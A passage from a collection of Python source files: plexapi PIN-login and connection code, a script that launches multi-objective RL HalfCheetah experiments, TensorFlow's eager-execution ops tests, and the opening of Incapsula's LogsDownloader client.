:class:`RuntimeError`: If the thread is already running.
:class:`RuntimeError`: If the PIN login for the current PIN has expired.
"""
if self._thread and not self._abort:
raise RuntimeError('MyPlexPinLogin thread is already running')
if self.expired:
raise RuntimeError('MyPlexPinLogin has expired')
self._loginTimeout = timeout
self._callback = callback
self._abort = False
self.finished = False
self._thread = threading.Thread(target=self._pollLogin, name='plexapi.myplex.MyPlexPinLogin')
self._thread.start()
def waitForLogin(self):
""" Waits for the PIN login to succeed or expire.
Parameters:
callback (Callable[str]): Callback called with the received authentication token (optional).
timeout (int): Timeout in seconds waiting for the PIN login to succeed (optional).
Returns:
`True` if the PIN login succeeded or `False` otherwise.
"""
if not self._thread or self._abort:
return False
self._thread.join()
if self.expired or not self.token:
return False
return True
def stop(self):
""" Stops the thread monitoring the PIN login state. """
if not self._thread or self._abort:
return
self._abort = True
self._thread.join()
def checkLogin(self):
""" Returns `True` if the PIN login has succeeded. """
if self._thread:
return False
try:
return self._checkLogin()
except Exception:
self.expired = True
self.finished = True
return False
def _getCode(self):
url = self.PINS
response = self._query(url, self._session.post)
if not response:
return None
self._id = response.attrib.get('id')
self._code = response.attrib.get('code')
return self._code
def _checkLogin(self):
if not self._id:
return False
if self.token:
return True
url = self.CHECKPINS.format(pinid=self._id)
response = self._query(url)
if not response:
return False
token = response.attrib.get('authToken')
if not token:
return False
self.token = token
self.finished = True
return True
def _pollLogin(self):
try:
start = time.time()
while not self._abort and (not self._loginTimeout or (time.time() - start) < self._loginTimeout):
try:
result = self._checkLogin()
except Exception:
self.expired = True
break
if result:
break
time.sleep(self.POLLINTERVAL)
if self.token and self._callback:
self._callback(self.token)
finally:
self.finished = True
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests for pin login. """
headers = BASE_HEADERS.copy()
if self.headers:
headers.update(self.headers)
headers.update(kwargs)
return headers
def _query(self, url, method=None, headers=None, **kwargs):
method = method or self._session.get
log.debug('%s %s', method.__name__.upper(), url)
headers = headers or self._headers()
response = method(url, headers=headers, timeout=self._requestTimeout, **kwargs)
if not response.ok: # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def _connect(cls, url, token, timeout, results, i, job_is_done_event=None):
""" Connects to the specified cls with url and token. Stores the connection
information to results[i] in a threadsafe way.
Arguments:
cls: the class which is responsible for establishing connection, basically it's
:class:`~plexapi.client.PlexClient` or :class:`~plexapi.server.PlexServer`
url (str): url which should be passed as `baseurl` argument to cls.__init__()
token (str): authentication token which should be passed as `baseurl` argument to cls.__init__()
timeout (int): timeout which should be passed as `baseurl` argument to cls.__init__()
results (list): pre-filled list for results
i (int): index of current job, should be less than len(results)
job_is_done_event (:class:`~threading.Event`): is X_PLEX_ENABLE_FAST_CONNECT is True then the
event would be set as soon the connection is established
"""
starttime = time.time()
try:
device = cls(baseurl=url, token=token, timeout=timeout)
runtime = int(time.time() - starttime)
results[i] = (url, token, device, runtime)
if X_PLEX_ENABLE_FAST_CONNECT and job_is_done_event:
job_is_done_event.set()
except Exception as err:
runtime = int(time.time() - starttime)
log.error('%s: %s', url, err)
results[i] = (url, token, None, runtime)
def _chooseConnection(ctype, name, results):
""" Chooses the first (best) connection from the given _connect results. """
# At this point we have a list of result tuples containing (url, token, PlexServer, runtime)
# or (url, token, None, runtime) in the case a connection could not be established.
for url, token, result, runtime in results:
okerr = 'OK' if result else 'ERR'
log.debug('%s connection %s (%ss): %s?X-Plex-Token=%s', ctype, okerr, runtime, url, token)
results = [r[2] for r in results if r and r[2] is not None]
if results:
log.debug('Connecting to %s: %s?X-Plex-Token=%s', ctype, results[0]._baseurl, results[0]._token)
return results[0]
raise NotFound('Unable to connect to %s: %s' % (ctype.lower(), name))
class AccountOptOut(PlexObject):
""" Represents a single AccountOptOut
'https://plex.tv/api/v2/user/{userUUID}/settings/opt_outs'
Attributes:
TAG (str): optOut
key (str): Online Media Source key
value (str): Online Media Source opt_in, opt_out, or opt_out_managed
"""
TAG = 'optOut'
CHOICES = {'opt_in', 'opt_out', 'opt_out_managed'}
def _loadData(self, data):
self.key = data.attrib.get('key')
self.value = data.attrib.get('value')
def _updateOptOut(self, option):
""" Sets the Online Media Sources option.
Parameters:
option (str): see CHOICES
Raises:
:exc:`~plexapi.exceptions.NotFound`: ``option`` str not found in CHOICES.
"""
if option not in self.CHOICES:
raise NotFound('%s not found in available choices: %s' % (option, self.CHOICES))
url = self._server.OPTOUTS % {'userUUID': self._server.uuid}
params = {'key': self.key, 'value': option}
self._server.query(url, method=self._server._session.post, params=params)
self.value = option # assume query successful and set the value to option
def optIn(self):
""" Sets the Online Media Source to "Enabled". """
self._updateOptOut('opt_in')
def optOut(self):
""" Sets the Online Media Source to "Disabled". """
self._updateOptOut('opt_out')
def optOutManaged(self):
""" Sets the Online Media Source to "Disabled for Managed Users".
Raises:
:exc:`~plexapi.exceptions.BadRequest`: When trying to opt out music.
"""
if self.key == 'tv.plex.provider.music':
raise BadRequest('%s does not have the option to opt out managed users.' % self.key)
self._updateOptOut('opt_out_managed')
|
halfcheetah-v2.py | import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/HalfCheetah-v2')
args = parser.parse_args()
random.seed(2000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-HalfCheetah-v2 '\
'--seed {} '\
'--num-env-steps 5000000 '\
'--warmup-iter 80 '\
'--update-iter 20 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
ops_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for operations in eager execution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.eager import execute
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import sparse_ops
class OpsTest(test_util.TensorFlowTestCase, parameterized.TestCase):
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = three * five
self.assertAllEqual(15, product)
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = math_ops.matmul(three, five)
self.assertEqual([[15.0]], product.numpy())
def testExecuteStringAttr(self):
three = constant_op.constant(3.0)
checked_three = array_ops.check_numerics(three,
message='just checking')
self.assertEqual([[3]], checked_three.numpy())
def testExecuteFloatAttr(self):
three = constant_op.constant(3.0)
almost_three = constant_op.constant(2.8)
almost_equal = math_ops.approximate_equal(
three, almost_three, tolerance=0.3)
self.assertTrue(almost_equal)
def testExecuteIntAttr(self):
three = constant_op.constant(3)
four = constant_op.constant(4)
total = math_ops.add_n([three, four])
self.assertAllEqual(7, total)
def testExecuteBoolAttr(self):
three = constant_op.constant([[3]])
five = constant_op.constant([[5]])
product = math_ops.matmul(three, five, transpose_a=True)
self.assertAllEqual([[15]], product)
def testExecuteOneListOutput(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
x1, x2, x3 = array_ops.split(value, 3, axis=split_dim)
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testGraphMode(self):
graph = ops.Graph()
with graph.as_default(), context.graph_mode():
array_ops.placeholder(dtypes.int32)
self.assertLen(graph.get_operations(), 1)
# See comments on handling of int32 tensors on GPU in
# EagerTensor.__init__.
@test_util.run_gpu_only
def testInt32CPUDefault(self):
with context.device('/gpu:0'):
r = constant_op.constant(1) + constant_op.constant(2)
self.assertAllEqual(r, 3)
def testExecuteListOutputLen1(self):
split_dim = constant_op.constant(1)
value = constant_op.constant([[0, 1, 2], [3, 4, 5]])
result = array_ops.split(value, 1, axis=split_dim)
self.assertIsInstance(result, list)
self.assertLen(result, 1)
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], result[0])
def testExecuteListOutputLen0(self):
empty = constant_op.constant([], dtype=dtypes.int32)
result = array_ops.unstack(empty, 0)
self.assertIsInstance(result, list)
self.assertEmpty(result)
def testExecuteMultipleNonListOutput(self):
x = constant_op.constant([1, 2, 3, 4, 5, 6])
y = constant_op.constant([1, 3, 5])
result = array_ops.listdiff(x, y)
out, idx = result
self.assertIs(out, result.out)
self.assertIs(idx, result.idx)
self.assertAllEqual([2, 4, 6], out)
self.assertAllEqual([1, 3, 5], idx)
def testExecuteMultipleListOutput(self):
split_dim = constant_op.constant(1, dtype=dtypes.int64)
indices = constant_op.constant([[0, 2], [0, 4], [0, 5], [1, 0], [1, 1]],
dtype=dtypes.int64)
values = constant_op.constant([2, 3, 5, 7, 11])
shape = constant_op.constant([2, 7], dtype=dtypes.int64)
result = sparse_ops.gen_sparse_ops.sparse_split(
split_dim,
indices,
values,
shape,
num_split=2)
output_indices, output_values, output_shape = result
self.assertLen(output_indices, 2)
self.assertLen(output_values, 2)
self.assertLen(output_shape, 2)
self.assertEqual(output_indices, result.output_indices)
self.assertEqual(output_values, result.output_values)
self.assertEqual(output_shape, result.output_shape)
self.assertAllEqual([[0, 2], [1, 0], [1, 1]], output_indices[0])
self.assertAllEqual([[0, 0], [0, 1]], output_indices[1])
self.assertAllEqual([2, 7, 11], output_values[0])
self.assertAllEqual([3, 5], output_values[1])
self.assertAllEqual([2, 4], output_shape[0])
self.assertAllEqual([2, 3], output_shape[1])
# TODO(josh11b): Test an op that has multiple outputs, some but not
# all of which are lists. Examples: barrier_take_many (currently
# unsupported since it uses a type list) or sdca_optimizer (I don't
# have an example of legal inputs & outputs).
def testComposition(self):
x = constant_op.constant(1, dtype=dtypes.int32)
three_x = x + x + x
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperatorOverrides(self):
def ops_test(v1, v2):
a = constant_op.constant(v1)
b = constant_op.constant(v2)
self.assertAllEqual((-a), np.negative(v1))
self.assertAllEqual(abs(b), np.absolute(v2))
self.assertAllEqual((a + b), np.add(v1, v2))
self.assertAllEqual((a - b), np.subtract(v1, v2))
self.assertAllEqual((a * b), np.multiply(v1, v2))
self.assertAllEqual((a * a), np.multiply(v1, v1))
if all(x >= 0 for x in v2):
self.assertAllEqual((a**b), np.power(v1, v2))
self.assertAllEqual((a / b), np.true_divide(v1, v2))
self.assertAllEqual((a / a), np.true_divide(v1, v1))
self.assertAllEqual((a % b), np.mod(v1, v2))
self.assertAllEqual((a < b), np.less(v1, v2))
self.assertAllEqual((a <= b), np.less_equal(v1, v2))
self.assertAllEqual((a > b), np.greater(v1, v2))
self.assertAllEqual((a >= b), np.greater_equal(v1, v2))
# TODO(b/120678848): Remove the else branch once we enable
# ops.Tensor._USE_EQUALITY by default.
if ops.Tensor._USE_EQUALITY:
self.assertAllEqual((a == b), np.equal(v1, v2))
self.assertAllEqual((a != b), np.not_equal(v1, v2))
else:
self.assertAllEqual((a == b), np.equal(v1, v2)[0])
self.assertAllEqual((a != b), np.not_equal(v1, v2)[0])
self.assertAllEqual(v1[0], a[constant_op.constant(0)])
ops_test([1, 4, 8], [2, 3, 5])
ops_test([1, -4, -5], [-2, 3, -6])
def test_basic_slice(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :], t[:, :, :])
self.assertAllEqual(npt[::, ::, ::], t[::, ::, ::])
self.assertAllEqual(npt[::1, ::1, ::1], t[::1, ::1, ::1])
self.assertAllEqual(npt[::1, ::5, ::2], t[::1, ::5, ::2])
self.assertAllEqual(npt[::-1, :, :], t[::-1, :, :])
self.assertAllEqual(npt[:, ::-1, :], t[:, ::-1, :])
self.assertAllEqual(npt[:, :, ::-1], t[:, :, ::-1])
self.assertAllEqual(npt[-2::-1, :, ::1], t[-2::-1, :, ::1])
self.assertAllEqual(npt[-2::-1, :, ::2], t[-2::-1, :, ::2])
def testDegenerateSlices(self):
npt = np.arange(1, 19, dtype=np.float32).reshape(3, 2, 3)
t = constant_op.constant(npt)
# degenerate by offering a forward interval with a negative stride
self.assertAllEqual(npt[0:-1:-1, :, :], t[0:-1:-1, :, :])
# degenerate with a reverse interval with a positive stride
self.assertAllEqual(npt[-1:0, :, :], t[-1:0, :, :])
# empty interval in every dimension
self.assertAllEqual(npt[-1:0, 2:2, 2:3:-1], t[-1:0, 2:2, 2:3:-1])
def testEllipsis(self):
npt = np.array(
[[[[[1, 2], [3, 4], [5, 6]]], [[[7, 8], [9, 10], [11, 12]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[0:], t[0:])
# implicit ellipsis
self.assertAllEqual(npt[0:, ...], t[0:, ...])
# ellipsis alone
self.assertAllEqual(npt[...], t[...])
# ellipsis at end
self.assertAllEqual(npt[0:1, ...], t[0:1, ...])
# ellipsis at begin
self.assertAllEqual(npt[..., 0:1], t[..., 0:1])
# ellipsis at middle
self.assertAllEqual(npt[0:1, ..., 0:1], t[0:1, ..., 0:1])
def testShrink(self):
npt = np.array([[[[[1, 2, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]],
[[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]]])
t = constant_op.constant(npt)
self.assertAllEqual(npt[:, :, :, :, 3], t[:, :, :, :, 3])
self.assertAllEqual(npt[..., 3], t[..., 3])
self.assertAllEqual(npt[:, 0], t[:, 0])
self.assertAllEqual(npt[:, :, 0], t[:, :, 0])
@test_util.run_gpu_only
def testOpWithInputsOnDifferentDevices(self):
# The GPU kernel for the Reshape op requires that the
# shape input be on CPU.
value = constant_op.constant([1., 2.]).gpu()
shape = constant_op.constant([2, 1])
reshaped = array_ops.reshape(value, shape)
self.assertAllEqual([[1], [2]], reshaped.cpu())
def testInt64(self):
# Fill requires the first input to be an int32 tensor.
self.assertAllEqual(
[1.0, 1.0],
array_ops.fill(constant_op.constant([2], dtype=dtypes.int64),
constant_op.constant(1)))
@test_util.run_gpu_only
def testOutputOnHostMemory(self):
# The Shape op kernel on GPU places the output in host memory.
value = constant_op.constant([1.]).gpu()
shape = array_ops.shape(value)
self.assertEqual([1], shape.numpy())
@test_util.run_gpu_only
def testSilentCopy(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
cpu_tensor = constant_op.constant(1.0)
gpu_tensor = cpu_tensor.gpu()
self.assertAllEqual(cpu_tensor + gpu_tensor, 2.0)
finally:
context._set_context(old_context)
# pylint: enable=protected-access
@test_util.run_gpu_only
def testSoftPlacement(self):
# Temporarily replace the context
# pylint: disable=protected-access
old_context = context.context()
context._set_context(context.Context())
try:
config.set_device_policy('silent')
config.set_soft_device_placement(True)
cpu_tensor = constant_op.constant(1.0)
result = cpu_tensor + cpu_tensor
self.assertEqual(result.device,
'/job:localhost/replica:0/task:0/device:GPU:0')
finally:
context._set_context(old_context)
# pylint: enable=protected-access
def testRandomUniform(self):
scalar_shape = constant_op.constant([], dtype=dtypes.int32)
x = random_ops.random_uniform(scalar_shape)
self.assertEqual(0, x.shape.ndims)
self.assertEqual(dtypes.float32, x.dtype)
x = random_ops.random_uniform(
scalar_shape, minval=constant_op.constant(5.),
maxval=constant_op.constant(6.))
self.assertLess(x, 6)
self.assertGreaterEqual(x, 5)
def testArgsToMatchingEagerDefault(self):
# Uses default
ctx = context.context()
allowed_dtypes = [dtypes.int32, dtypes.int64]
# Follows standard int conversion rules
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.int32)
self.assertEqual(t, dtypes.int32)
self.assertEqual(r[0].dtype, dtypes.int32)
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.int64)
self.assertEqual(t, dtypes.int32)
self.assertEqual(r[0].dtype, dtypes.int32)
# Use int64 since it is a better fit
t, r = execute.args_to_matching_eager([[2**48]], ctx, allowed_dtypes,
dtypes.int32)
self.assertEqual(t, dtypes.int64)
self.assertEqual(r[0].dtype, dtypes.int64)
# When the regular tensor conversion fails, then use the default type as a
# hint.
allowed_dtypes = [dtypes.uint32, dtypes.uint32]
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.uint32)
self.assertEqual(t, dtypes.uint32)
self.assertEqual(r[0].dtype, dtypes.uint32)
t, r = execute.args_to_matching_eager([[3, 4]], ctx, allowed_dtypes,
dtypes.uint64)
self.assertEqual(t, dtypes.uint64)
self.assertEqual(r[0].dtype, dtypes.uint64)
t, r = execute.args_to_matching_eager([], ctx, allowed_dtypes, dtypes.int64)
self.assertEqual(t, dtypes.int64)
# Doesn't use default
allowed_dtypes = [dtypes.int32, dtypes.string]
t, r = execute.args_to_matching_eager([['string', 'arg']], ctx,
allowed_dtypes, dtypes.int32)
self.assertEqual(t, dtypes.string)
self.assertEqual(r[0].dtype, dtypes.string)
def testFlattenLayer(self):
flatten_layer = core.Flatten()
x = constant_op.constant([[[-10, -20], [-30, -40]], [[10, 20], [30, 40]]])
y = flatten_layer(x)
self.assertAllEqual([[-10, -20, -30, -40], [10, 20, 30, 40]], y)
def testIdentity(self):
self.assertAllEqual(2, array_ops.identity(2))
@test_util.run_gpu_only
def testIdentityOnVariable(self):
with context.device('/gpu:0'):
v = resource_variable_ops.ResourceVariable(True)
self.assertAllEqual(True, array_ops.identity(v))
def testIncompatibleSetShape(self):
x = constant_op.constant(1)
with self.assertRaises(ValueError):
x.set_shape((1, 2))
def testCompatibleSetShape(self):
x = constant_op.constant([[1, 2]])
x.set_shape(tensor_shape.TensorShape([None, 2]))
self.assertEqual(x.get_shape(), (1, 2))
@parameterized.named_parameters(
('Tensor', lambda: constant_op.constant(1.3+1j)),
('Variable', lambda: resource_variable_ops.ResourceVariable(1.3+1j)))
def testCastToPrimitiveTypesFrom(self, value_fn):
x = value_fn()
self.assertIsInstance(int(x), int)
self.assertEqual(int(x), 1)
self.assertIsInstance(float(x), float)
self.assertAllClose(float(x), 1.3)
self.assertIsInstance(complex(x), complex)
self.assertAllClose(complex(x), 1.3+1j)
def testCastNonScalarToPrimitiveTypesFails(self):
x = constant_op.constant([1.3, 2])
with self.assertRaises(TypeError):
int(x)
with self.assertRaises(TypeError):
float(x)
def testRange(self):
x = constant_op.constant(2)
self.assertEqual([0, 1], list(range(x)))
def testFormatString(self):
x = constant_op.constant(3.1415)
self.assertEqual('3.14', '{:.2f}'.format(x))
def testNoOpIsNone(self):
self.assertIsNone(control_flow_ops.no_op())
def testEagerContextPreservedAcrossThreads(self):
def init_fn():
self.assertTrue(context.executing_eagerly())
with ops.init_scope():
self.assertTrue(context.executing_eagerly())
context_switches = context.context().context_switches
self.assertLen(context_switches.stack, 1)
self.assertFalse(context_switches.stack[0].is_building_function)
self.assertEqual(context_switches.stack[0].enter_context_fn,
context.eager_mode)
self.assertTrue(context.executing_eagerly())
t1 = threading.Thread(target=init_fn)
t1.start()
t1.join()
def testWeakrefEagerTensor(self):
x = constant_op.constant([[1.]])
x.at1 = constant_op.constant([[2.]])
x.at2 = 3.
weak_x = weakref.ref(x)
weak_xat1 = weakref.ref(x.at1)
del x
self.assertIs(weak_x(), None)
self.assertIs(weak_xat1(), None)
def testWeakKeyDictionaryTensor(self):
weak_key_dict = weakref.WeakKeyDictionary()
strong_x = constant_op.constant([[1.]])
strong_y = constant_op.constant([[2.]])
strong_x_ref = strong_x.ref()
strong_y_ref = strong_y.ref()
weak_key_dict[strong_x_ref] = constant_op.constant([[3.]])
weak_key_dict[strong_y_ref] = constant_op.constant([[4.]])
strong_y.a = constant_op.constant([[5.]])
weak_x_ref = weakref.ref(strong_x)
del strong_x, strong_x_ref
self.assertIs(weak_x_ref(), None)
self.assertEqual([strong_y_ref], list(weak_key_dict))
self.assertLen(list(weak_key_dict), 1)
self.assertLen(weak_key_dict, 1)
del strong_y, strong_y_ref
self.assertEqual([], list(weak_key_dict))
def testEagerTensorsCanBeGarbageCollected(self):
x = constant_op.constant([[1.]])
y = constant_op.constant([[2.]])
x.y = y
y.x = x
weak_x = weakref.ref(x)
weak_y = weakref.ref(y)
del x
del y
gc.collect()
self.assertIs(weak_x(), None)
self.assertIs(weak_y(), None)
@test_util.disable_tfrt('TFE_ContextGetExecutorForThread not implemented '
'b/156188669')
def testAsyncExceptionStackTrace(self):
config.set_synchronous_execution(False)
def exception_originated_from_here():
# Invalid shapes for matmul.
return math_ops.matmul([[1]], [[2], [3]])
# In sync mode, an exception would have been raised here but since this is
# in async, the exception will be raised next.
x = exception_originated_from_here()
with self.assertRaisesRegex(errors_impl.InvalidArgumentError,
'in exception_originated_from_here'):
x.numpy()
context.async_clear_error()
config.set_synchronous_execution(True)
def testCrossContextTensorCache(self):
old_context = context.context()
old_x = constant_op.constant(9.5)
context._set_context(context.Context())
try:
new_x = constant_op.constant(9.5)
self.assertEqual(new_x.numpy(), 9.5)
finally:
context._set_context(old_context)
self.assertEqual(old_x.numpy(), 9.5)
if __name__ == '__main__':
test.main()
|
LogsDownloader.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Doron Lehmann, Incapsula, Inc.
# Date: 2015
# Description: Logs Downloader Client
#
# ************************************************************************************
# Copyright (c) 2015, Incapsula, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# ************************************************************************************
#
import configparser
import base64
import getopt
import hashlib
import logging
import os
import platform
import re
import signal
import sys
import threading
import time
import traceback
import ssl
import urllib3
import zlib
from logging import handlers
import socket
import M2Crypto
from Crypto.Cipher import AES
"""
Main class for downloading log files
"""
class LogsDownloader:
# the LogsDownloader will run until external termination
running = True
def __init__(self, config_path, system_log_path, log_level):
# set a log file for the downloader
self.logger = logging.getLogger("logsDownloader")
# default log directory for the downloader
log_dir = system_log_path
# create the log directory if needed
if not os.path.exists(log_dir):
os.makedirs(log_dir)
# keep logs history for 7 days
file_handler = logging.handlers.TimedRotatingFileHandler(os.path.join(log_dir, "logs_downloader.log"), when='midnight', backupCount=7)
formatter = logging.Formatter("%(asctime)s %(levelname)s %(message)s")
file_handler.setFormatter(formatter)
self.logger.addHandler(file_handler)
console_handler = logging.StreamHandler()
console_handler.setFormatter(formatter)
self.logger.addHandler(console_handler)
if log_level == "DEBUG":
self.logger.setLevel(logging.DEBUG)
elif log_level == "INFO":
self.logger.setLevel(logging.INFO)
elif log_level == "ERROR":
self.logger.setLevel(logging.ERROR)
self.logger.debug("Initializing LogsDownloader")
self.config_path = config_path
self.config_reader = Config(self.config_path, self.logger)
try:
# read the configuration file and load it
self.config = self.config_reader.read()
except Exception:
self.logger.error("Exception while getting LogsDownloader config file - Could Not find Configuration file - %s", traceback.format_exc())
sys.exit("Could Not find Configuration file")
# create a file downloader handler
self.file_downloader = FileDownloader(self.config, self.logger)
# create a last file id handler
self.last_known_downloaded_file_id = LastFileId(self.config_path)
# create a logs file index handler
self.logs_file_index = LogsFileIndex(self.config, self.logger, self.file_downloader)
# create log folder if needed for storing downloaded logs
if self.config.SAVE_LOCALLY == "YES":
if not os.path.exists(self.config.PROCESS_DIR):
os.makedirs(self.config.PROCESS_DIR)
self.logger.info("LogsDownloader initializing is done")
"""
Download the log files.
If this is the first time, we get the logs.index file, scan it, and download all of the files in it.
It this is not the first time, we try to fetch the next log file.
"""
def get_log_files(self):
retries = 0
while self.running:
# check what is the last log file that we downloaded
last_log_id = self.last_known_downloaded_file_id.get_last_log_id()
# if there is no last downloaded file
if last_log_id == "":
self.logger.info("No last downloaded file is found - downloading index file and starting to download all the log files in it")
try:
# download the logs.index file
self.logs_file_index.download()
# scan it and download all of the files in it
self.first_time_scan()
except Exception as e:
self.logger.error("Failed to downloading index file and starting to download all the log files in it - %s, %s", e, traceback.format_exc())
# wait for 30 seconds between each iteration
